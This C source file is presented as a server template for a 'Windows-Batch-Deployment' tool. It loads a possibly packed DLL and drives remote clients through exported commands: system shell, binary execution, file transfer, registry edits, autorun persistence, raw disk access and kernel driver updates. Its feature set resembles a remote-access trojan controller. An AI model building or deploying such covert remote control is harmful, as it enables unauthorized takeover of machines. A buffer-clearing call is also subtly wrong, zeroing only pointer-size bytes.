﻿/*
	Author: Axt Müller
	Description: Windows-Batch-Deployment simple user-defined server program templete.
	Warning: THIS FILE SHOULD NOT BE MODIFIED.
*/
#include <stdio.h>
#include <Windows.h>
#include "template.h"

#define PRINTF printf

typedef struct _CLIENT_THREAD_INFO
{
	ULONG64 hash;
	ULONG thread;
}CLIENT_THREAD_INFO, *PCLIENT_THREAD_INFO;

typedef void (__stdcall *WorkingProcedure)(PCLIENT_INFO p, char *szClientVersion);

WorkingProcedure g_pWorkingProcedure = NULL;
CHAR g_szLatestClientVersion[16] = {0};
ULONG64 g_Hash[MAX_CONNECT_REQUEST] = {0};
ULONG g_HashCount = 0;
CLIENT_THREAD_INFO g_c_t[MAX_CONNECT_REQUEST] = {0};
CRITICAL_SECTION g_c_t_lock = {0};

init _init = NULL;
uninit _uninit = NULL;
ClientList _ClientList = NULL;
ClientConnect _ClientConnect = NULL;
ClientDisconnect _ClientDisconnect = NULL;
ClientTest _ClientTest = NULL;
ClientReboot _ClientReboot = NULL;
ClientShutdown _ClientShutdown = NULL;
ClientUpdate _ClientUpdate = NULL;
ClientConfig _ClientConfig = NULL;
CmdQueryDirectory _CmdQueryDirectory = NULL;
CmdUploadFileTo _CmdUploadFileTo = NULL;
CmdDownloadFileFrom _CmdDownloadFileFrom = NULL;
CmdExecuteBinary _CmdExecuteBinary = NULL;
CmdSystemShell _CmdSystemShell = NULL;
CmdFileOperation _CmdFileOperation = NULL;
CmdQueryRegistry _CmdQueryRegistry = NULL;
CmdRegistryOperation _CmdRegistryOperation = NULL;
CmdAddAutoRunBin _CmdAddAutoRunBin = NULL;
CmdDelAutoRunBin _CmdDelAutoRunBin = NULL;
CmdQueryAutoRunBin _CmdQueryAutoRunBin = NULL;
CmdClearAutoRunBin _CmdClearAutoRunBin = NULL;
CmdQuerySetSystemInformation _CmdQuerySetSystemInformation = NULL;
CmdReadWriteDisk _CmdReadWriteDisk = NULL;
UpdateServer _UpdateServer = NULL;
UpdateClient _UpdateClient = NULL;

BOOLEAN InitializeApis()
{
#ifdef _M_X64
	HMODULE hMod = LoadLibraryW(L"Server64.vmp.dll");
	if(!hMod){hMod = LoadLibraryW(L"Server64.dll");}
#else
	HMODULE hMod = LoadLibraryW(L"Server32.vmp.dll");
	if(!hMod){hMod = LoadLibraryW(L"Server32.dll");}
#endif
	if(hMod)
	{
		_init = (init)GetProcAddress(hMod, "init");
		_uninit = (uninit)GetProcAddress(hMod, "uninit");
		_ClientList = (ClientList)GetProcAddress(hMod, "ClientList");
		_ClientConnect = (ClientConnect)GetProcAddress(hMod, "ClientConnect");
		_ClientDisconnect = (ClientDisconnect)GetProcAddress(hMod, "ClientDisconnect");
		_ClientTest = (ClientTest)GetProcAddress(hMod, "ClientTest");
		_ClientReboot = (ClientReboot)GetProcAddress(hMod, "ClientReboot");
		_ClientShutdown = (ClientShutdown)GetProcAddress(hMod, "ClientShutdown");
		_ClientUpdate = (ClientUpdate)GetProcAddress(hMod, "ClientUpdate");
		_ClientConfig = (ClientConfig)GetProcAddress(hMod, "ClientConfig");
		_CmdQueryDirectory = (CmdQueryDirectory)GetProcAddress(hMod, "CmdQueryDirectory");
		_CmdUploadFileTo = (CmdUploadFileTo)GetProcAddress(hMod, "CmdUploadFileTo");
		_CmdDownloadFileFrom = (CmdDownloadFileFrom)GetProcAddress(hMod, "CmdDownloadFileFrom");
		_CmdExecuteBinary = (CmdExecuteBinary)GetProcAddress(hMod, "CmdExecuteBinary");
		_CmdSystemShell = (CmdSystemShell)GetProcAddress(hMod, "CmdSystemShell");
		_CmdFileOperation = (CmdFileOperation)GetProcAddress(hMod, "CmdFileOperation");
		_CmdQueryRegistry = (CmdQueryRegistry)GetProcAddress(hMod, "CmdQueryRegistry");
		_CmdRegistryOperation = (CmdRegistryOperation)GetProcAddress(hMod, "CmdRegistryOperation");
		_CmdAddAutoRunBin = (CmdAddAutoRunBin)GetProcAddress(hMod, "CmdAddAutoRunBin");
		_CmdDelAutoRunBin = (CmdDelAutoRunBin)GetProcAddress(hMod, "CmdDelAutoRunBin");
		_CmdQueryAutoRunBin = (CmdQueryAutoRunBin)GetProcAddress(hMod, "CmdQueryAutoRunBin");
		_CmdClearAutoRunBin = (CmdClearAutoRunBin)GetProcAddress(hMod, "CmdClearAutoRunBin");
		_CmdQuerySetSystemInformation = (CmdQuerySetSystemInformation)GetProcAddress(hMod, "CmdQuerySetSystemInformation");
		_CmdReadWriteDisk = (CmdReadWriteDisk)GetProcAddress(hMod, "CmdReadWriteDisk");
		_UpdateServer = (UpdateServer)GetProcAddress(hMod, "UpdateServer");
		_UpdateClient = (UpdateClient)GetProcAddress(hMod, "UpdateClient");
		if(_init && _uninit && _ClientList && _ClientConnect && _ClientDisconnect && 
			_ClientTest && _ClientReboot && _ClientShutdown && _ClientUpdate && _ClientConfig && 
			_CmdQueryDirectory && _CmdUploadFileTo && _CmdDownloadFileFrom && _CmdExecuteBinary && 
			_CmdSystemShell && _CmdFileOperation && _CmdQueryRegistry && _CmdRegistryOperation && 
			_CmdAddAutoRunBin && _CmdDelAutoRunBin && _CmdQueryAutoRunBin && _CmdClearAutoRunBin && 
			_CmdQuerySetSystemInformation && _CmdReadWriteDisk && _UpdateServer && _UpdateClient)
		{
			return TRUE;
		}
	}
	return FALSE;
}

void CheckUpdate()
{
	//Query the latest version of client driver.
	char szLatestServerVersion[16] = {0}, szCurrentServerVersion[16] = {0};
	if(_UpdateClient(g_szLatestClientVersion, "LatestClient32.sys", "LatestClient64.sys"))
	{
		PRINTF("Latest Client Version: %s\n", g_szLatestClientVersion);
	}
	else
	{
		PRINTF("Check client update unsuccessfully!\n");
	}
	//Query the latest version of server DLL.
	if(_UpdateServer(szCurrentServerVersion, szLatestServerVersion, "LatestServer32.dll", "LatestServer64.dll"))
	{
		PRINTF("Latest Server Version: %s\n", szLatestServerVersion);
		PRINTF("Current Server Version: %s\n", szCurrentServerVersion);
		if(stricmp(szLatestServerVersion, szCurrentServerVersion)==0)
		{
			PRINTF("The server DLL is up to date.\n");
		}
		else
		{
			PRINTF("The server DLL needs to be updated!\n");
		}
	}
	else
	{
		PRINTF("Check server update unsuccessfully!\n");
	}
}

BOOLEAN CheckHash(ULONG64 hash)
{
	ULONG i;
	BOOLEAN b = FALSE;
	for(i = 0; i < g_HashCount; i++)
	{
		if(hash==g_Hash[i])
		{
			b = TRUE;
			break;
		}
	}
	return b;
}

void AddHash(ULONG64 hash)
{
	if(g_HashCount < MAX_CONNECT_REQUEST)
	{
		g_Hash[g_HashCount] = hash;
		g_HashCount++;
	}
}

BOOLEAN IsClientThreadAlive(ULONG64 hash)
{
	ULONG i;
	BOOLEAN b = FALSE;
	EnterCriticalSection(&g_c_t_lock);
	for(i = 0; i < MAX_CONNECT_REQUEST; i++)
	{
		if(hash==g_c_t[i].hash)
		{
			if(g_c_t[i].thread)
			{
				b = TRUE;
			}
			break;
		}
	}
	LeaveCriticalSection(&g_c_t_lock);
	return b;
}

BOOLEAN AddDelClientThread(ULONG64 hash, DWORD tid)
{
	ULONG i;
	BOOLEAN b = FALSE;
	EnterCriticalSection(&g_c_t_lock);
	if(tid)
	{
		for(i = 0; i < MAX_CONNECT_REQUEST; i++)
		{
			if(g_c_t[i].hash == 0)
			{
				g_c_t[i].hash = hash;
				g_c_t[i].thread = tid;
				b = TRUE;
				break;
			}
		}
	}
	else
	{
		for(i = 0; i < MAX_CONNECT_REQUEST; i++)
		{
			if(g_c_t[i].hash == hash)
			{
				g_c_t[i].hash = 0;
				g_c_t[i].thread = 0;
				b = TRUE;
				break;
			}
		}
	}
	LeaveCriticalSection(&g_c_t_lock);
	return b;
}

DWORD WorkerThread(void *parameter)
{
	PCLIENT_INFO p = (PCLIENT_INFO)parameter;
	ULONG WaitTime = 0;
	ULONG64 ClientVersion = 0;
	char szClientVersion[16] = {0};
	//Wait for the client connection to complete, it needs some time!
	while(WaitTime < USN_PAGE_SIZE * 4)
	{
		Sleep(USN_PAGE_SIZE / 4);
		WaitTime += USN_PAGE_SIZE / 4;
		_ClientTest(p->id, &ClientVersion);
		if(ClientVersion)
		{
			PRINTF("[%04ld]The client version: %ld.\n", p->id, (ULONG)ClientVersion);
			_i64toa(ClientVersion, szClientVersion, 10);
			break;
		}
	}
	//If ClientVersion is 0, it means that the connection was not established successfully.
	if(!ClientVersion)
	{
		PRINTF("[%04ld]The client did not connect.\n", p->id);
		goto __exit;
	}
	//Call the working procedure
	if(g_pWorkingProcedure)
	{
		g_pWorkingProcedure(p, szClientVersion);
	}
__exit:
	PRINTF("[%04ld]Thread exited!!!\n", p->id);
	//Mark the client's thread has exited, disconnect the client and exit thread.
	AddDelClientThread(p->hash, 0);
	_ClientDisconnect(p->id);
	FREE(p);
	ExitThread(0);
}

void __stdcall CreateSimpleServer
(
	DWORD dwServerPort, 
	void *pWorkingProcedure, 
	BOOLEAN bCheckUpdate, 
	BOOLEAN bOnlyConnectOnce, 
	DWORD dwMaxQueryCount,
	DWORD dwQueryInterval
)
{
	DWORD dwQueryCount = 0;
	//Allocate memory for saving CLIENT_INFO structures.
	PCLIENT_INFO pClientInfo = (PCLIENT_INFO)MALLOC(MAX_CONNECT_REQUEST*sizeof(CLIENT_INFO));
	if(pClientInfo)
	{
		//Set user-defined handling function
		g_pWorkingProcedure = (WorkingProcedure)pWorkingProcedure;
		//Initialize critical section.
		InitializeCriticalSection(&g_c_t_lock);
		//Initialize DLL.
		if(InitializeApis())
		{
			//Check update if needed.
			if(bCheckUpdate)
			{
				printf("Checking for updates...\n");
				CheckUpdate();
			}
			//Initialize connection.
			if(_init((int)dwServerPort))
			{
				printf("The initialization is done. Now working...\n");
				//Cyclically query and handle clients.
				while(1)
				{
					//Query clients.
					ULONG i, c = _ClientList(pClientInfo);
					if(c)
					{
						//Traverse every client.
						for(i = 0; i < c; i++)
						{
							//Check the clients that wait for connection.
							if(_strnicmp(pClientInfo[i].szStatus, CLIENT_STATUS_ONLINE, strlen(CLIENT_STATUS_ONLINE))==0)
							{
								BOOLEAN bNeedConnect = TRUE;
								//For some situations, the clients don't need be connected again if operations are done.
								if(bOnlyConnectOnce)
								{
									//If the client is not in the list, add it to the list and let it connect. Otherwise, ignore it.
									if(CheckHash(pClientInfo[i].hash))
									{
										bNeedConnect = FALSE;
									}
									else
									{
										AddHash(pClientInfo[i].hash);
									}
								}
								//Handle the clients that need to be connected.
								if(bNeedConnect)
								{
									//If the thread for this client is still running, don't create a new thread for it.
									if(IsClientThreadAlive(pClientInfo[i].hash)==FALSE)
									{
										PRINTF("NEW-CLIENT: %04ld %016I64X %s %s\n", pClientInfo[i].id, pClientInfo[i].hash, pClientInfo[i].szAddr, pClientInfo[i].szDescription);
										//Try to connect the client.
										if(_ClientConnect(pClientInfo[i].id))
										{
											//Allocate memory for new client info.
											PCLIENT_INFO pc = (PCLIENT_INFO)MALLOC(sizeof(CLIENT_INFO));
											if(pc)
											{
												ULONG tid = 0;
												HANDLE h = NULL;
												//Copy client info.
												memcpy(pc, &pClientInfo[i], sizeof(CLIENT_INFO));
												//Create a thread to handle each client.
												h = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)WorkerThread, pc, 0, &tid);
												if(h)
												{
													//Mark the client's thread has created.
													AddDelClientThread(pClientInfo[i].hash, tid);
													CloseHandle(h);
												}
											}
										}
									}
								}
							}
						}
					}
					//Clear current client info.
					RtlZeroMemory(pClientInfo, sizeof(pClientInfo));
					//Wait a while, and then query clients again.
					Sleep(dwQueryInterval);
					//Decide to continue or break out of the loop, if dwMaxQueryCount is not 0.
					if(dwMaxQueryCount>0)
					{
						dwQueryCount++;
						if(dwQueryCount>=dwMaxQueryCount)
						{
							break;
						}
					}
				}
				_uninit();
			}
			else
			{
				PRINTF("Initialize connection unsuccessfully.\n");
			}
		}
		else
		{
			PRINTF("Loading DLL unsuccessfully.\n");
		}
		DeleteCriticalSection(&g_c_t_lock);
		FREE(pClientInfo);
	}
	else
	{
		PRINTF("Allocate memory unsuccessfully.\n");
	}
}